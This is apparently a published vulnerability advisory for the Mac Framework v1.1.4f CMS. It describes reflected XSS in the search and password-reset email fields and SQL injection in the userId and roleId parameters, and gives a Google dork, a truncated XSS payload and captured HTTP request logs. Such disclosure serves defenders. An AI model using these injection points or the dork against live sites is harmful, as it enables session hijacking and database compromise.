+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+1.1 & 1.2
+Multiple non-persistent cross site scripting web vulnerabilities has
+been discovered in the official Mac Framework v1.1.4f Content Managament
+System.
+The vulnerability allows remote attackers to manipulate client-side
+browser to web-applicatio requests to compromise user sesson credentials
+or to
+manipulate module content.
+
+The first vulnerability is located in the search input field of the
+search module. Remote attackers are able to inject own malicious script
+code as
+search entry to execute the code within the results page that is loaded
+shortly after the request is performed. The request method to inject is
+POST
+and the attack vector is located on the client-side with non-persistent
+attack vector.
+
+The second vulnerability is located in the email input field of the
+account reset function. Remote attackers are able to inject own
+malicious script code as
+email to reset the passwort to execute the code within performed
+request. The request method to inject is POST and the attack vector is
+located on the
+client-side with non-persistent attack vector.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, non-persistent phishing attacks, non-persistent external
+redirects to
+malicious source and non-persistent manipulation of affected or
+connected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Parameter(s):
+[+] searchString
+[+] emailAdress
+
+
+1.3
+Multiple remote sql-injection web vulnerabilities has been discovered in
+the official Mac Framework v1.1.4f Content Managament System.
+The vulnerability allows remote attackers to inject or execute own sql
+commands to compromise the dbms or file system of the application.
+
+The sql injection vulnerabilities are located in the `roleId` and
+`userId` of the `editRole` and `deletUser` module. The request method to
+inject or execute commands is GET and the attack vector is located on
+the application-side. Attackers with privileged accounts to edit are
+able to inject own sql queries via roleid and userid on deleteUser or
+editRole. Multiple unhandled and broken sql queries are visible as default
+debug to output for users as well.
+
+Exploitation of the remote sql injection vulnerability requires no user
+interaction and a privileged web-application user account.
+Successful exploitation of the remote sql injection results in database
+management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] deleteUser
+[+] editRole
+
+Vulnerable Parameter(s):
+[+] userId
+[+] roleId
+
+
+Proof of Concept (PoC):
+=======================
+Google Dork(s): intitle, subtitle & co.
+Site Powered by Mac's PHP MVC Framework Framework of the future
+Design downloaded from Zeroweb.org: Free website templates, layouts, and
+tools.
+
+
+1.1
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without user account and with low user
+interaction.
+For security demonstration or to reproduce the cross site scripting web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payload
+>">"
+
+
+
+
+--- PoC Session Logs [POST] ---
+https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
+Host: macs-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 17
+Origin: https://macs-cms.localhost:8080
+Connection: keep-alive
+Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
+Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
+ajaxRequest=true
+-
+POST: HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+Pragma: no-cache
+Content-Type: text/html; charset=ISO-8859-1
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+X-Powered-By-Plesk: PleskWin
+Content-Length: 335
+-
+https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
+Host: macs-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 123
+Origin: https://macs-cms.localhost:8080
+Connection: keep-alive
+Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
+Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
+ajaxRequest=true&=&emailAddress=test" 
